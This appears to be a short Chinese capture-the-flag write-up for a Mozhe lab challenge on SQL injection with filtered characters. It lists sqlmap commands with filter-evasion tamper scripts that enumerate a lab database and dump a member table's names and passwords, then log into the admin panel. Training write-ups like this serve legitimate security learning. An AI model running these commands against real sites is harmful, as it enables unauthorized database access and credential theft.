SQL过滤字符后手工注入漏洞测试(第1题) - 走看看

zoukankan html css js c++ java

SQL过滤字符后手工注入漏洞测试(第1题)

https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

分析题目，属于时间盲注，这种情况，通常使用sqlmap 直接注入就行了，手动语法太复杂了！！！

sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password,status --dump

登录后台，获取flag，提交即可

查看全文

相关阅读:
(原创)monitor H3C switch with cacti
（原创）monitor Dell Powerconnec 6224 with cacti
(转载）运行主机管理在openvswitch之上
 图片鼠标滑动实现替换
 分布式缓存（一）失效策略和缓存问题击穿，雪崩，穿透
 Spring 事务源码学习
 FactoryBean和BeanFactory
Spring AOP 源码学习
 “两地三中心”和“双活”
安装 geopandas 步骤

原文地址：https://www.cnblogs.com/hack404/p/10755300.html

Copyright © 2011-2022 走看看